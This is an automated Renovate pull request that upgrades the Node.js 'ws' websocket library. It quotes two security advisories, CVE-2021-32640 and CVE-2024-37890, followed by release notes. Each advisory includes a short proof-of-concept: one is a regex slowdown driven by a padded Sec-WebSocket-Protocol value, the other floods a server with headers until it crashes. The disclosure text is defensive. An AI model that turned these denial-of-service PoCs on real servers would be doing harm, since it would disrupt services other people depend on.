[dist] Update dependency ws to v6 [SECURITY]

[renovate[bot]]

trafficstars

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
ws	^3.0.0 -> ^6.0.0

GitHub Vulnerability Alerts

CVE-2021-32640

Impact

A specially crafted value of the Sec-Websocket-Protocol header can be used to significantly slow down a ws server.

Proof of concept

for (const length of [1000, 2000, 4000, 8000, 16000, 32000]) {
  const value = 'b' + ' '.repeat(length) + 'x';
  const start = process.hrtime.bigint();

  value.trim().split(/ *, */);

  const end = process.hrtime.bigint();

  console.log('length = %d, time = %f ns', length, end - start);
}

Patches

The vulnerability was fixed in [email protected] (https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff) and backported to [email protected] (https://github.com/websockets/ws/commit/78c676d2a1acefbc05292e9f7ea0a9457704bf1b) and [email protected] (https://github.com/websockets/ws/commit/76d47c1479002022a3e4357b3c9f0e23a68d4cd2).

Workarounds

In vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options.

Credits

The vulnerability was responsibly disclosed along with a fix in private by Robert McLaughlin from University of California, Santa Barbara.

CVE-2024-37890

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in [email protected] (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to [email protected] (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), [email protected] (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and [email protected] (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
2. Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References

• https://github.com/websockets/ws/issues/2230
• https://github.com/websockets/ws/pull/2231

---

Release Notes

websockets/ws (ws)

v6.2.2

Compare Source

Bug fixes

• Backported 00c425e to the 6.x release line (78c676d).

v6.2.1

Compare Source

Bug fixes

• Fixed a bug that, under certain circumstances, prevented the close timer from being set (aa1dcd5).

v6.2.0

Compare Source

Features

• Added ability to follow redirects (#​1490).

Bug fixes

• The opening handshake is now aborted if the Sec-WebSocket-Key header field value is invalid (160af45).

v6.1.4

Compare Source

Bug fixes

• Fixed an issue that caused the Host header to always include a port (#​1510).

v6.1.3

Compare Source

Bug fixes

• Fixed a bug that, under certain circumstances, prevented the close frame from being parsed (#​1494).

v6.1.2

Compare Source

Bug fixes

• Restored compatibility with Node.js < 6.13.0 (26436e0).

v6.1.1

Compare Source

Bug fixes

• Queued messages to send are now discarded if the permessage-deflate is enabled and the socket closes prematurely (#​1464, #​1471).

v6.1.0

Compare Source

Features

• The WebSocket server now emits a 'close' event when the server closes (#​1453).

v6.0.0

Compare Source

Breaking changes

• Dropped support for Node.js 4 (d73885c).
• Added a shim that throws an error when used if the package is bundled for the browser (#​1345).
• Added a maxPayload option on the client. Defaults to 100 MiB (#​1402).
• Dropped support for the memLevel and level options. Use zlibDeflateOptions instead. (80e2002).

v5.2.4

Compare Source

Bug fixes

• Backported e55e510 to the 5.x release line (4abd8f6).

v5.2.3

Compare Source

Bug fixes

• Backported 00c425e to the 5.x release line (76d47c1).

v5.2.2

Compare Source

Bug fixes

• Fixed a use after invalidation bug introduced in 6046a28 (8aba871).

v5.2.1

Compare Source

Bug fixes

• Fixed a bug that could prevent buffered data from being processed under certain circumstances (6046a28).

v5.2.0

Compare Source

Features

• Added ability to specify custom headers when rejecting the handshake (#​1379).

v5.1.1

Compare Source

Bug fixes

• Fixed a regression introduced in 9e152f9 (#​1347).

v5.1.0

Compare Source

Features

• The address argument of the WebSocket constructor can now be a [URL][URL] instance (#​1329).
• The options argument of the WebSocket constructor now accepts any TLS option that is also accepted by [https.request()][https.request()] (#​1332).

v5.0.0

Compare Source

Breaking changes

• Dropped support for Node.js < 4.5.0 (#​1313).
• The connection is no longer closed if the server does not agree to any of the client's requested subprotocols (#​1312).
• net.Socket errors are no longer re-emitted (a4050db).

Features

• Read backpressure is now properly handled when permessage-deflate is enabled (#​1302).

v4.1.0

Compare Source

Features

• Added WebSocketServer.prototype.address() (#​1294).
• Added zlib{Deflate,Inflate}Options options (#​1306).

v4.0.0

Compare Source

Breaking changes

• The close status code is now set to 1005 if the received close frame contains no status code (a31b1f6).
• Error messages and types have been updated (695c5ea).
• The onerror event handler now receives an ErrorEvent instead of JavaScript error (63e275e).
• The third argument of WebSocket.prototype.ping() and WebSocket.prototype.pong() is no longer a boolean but an optional callback (30c9f71).
• The non-standard protocolVersion and bytesReceived attributes have been removed (30c9f71...ee9b5f3).
• The extensions attribute is no longer an object but a string representing the extensions selected by the server (fdec524).
• The 'headers' event on the client has been renamed to 'upgrade'. Listeners of this event now receive only the response argument (1c783c2).
• The WebSocket.prototype.pause() and WebSocket.prototype.resume() methods have been removed to prevent the user from interfering with the state of the underlying net.Socket stream (a206e98).

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• [ ] If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.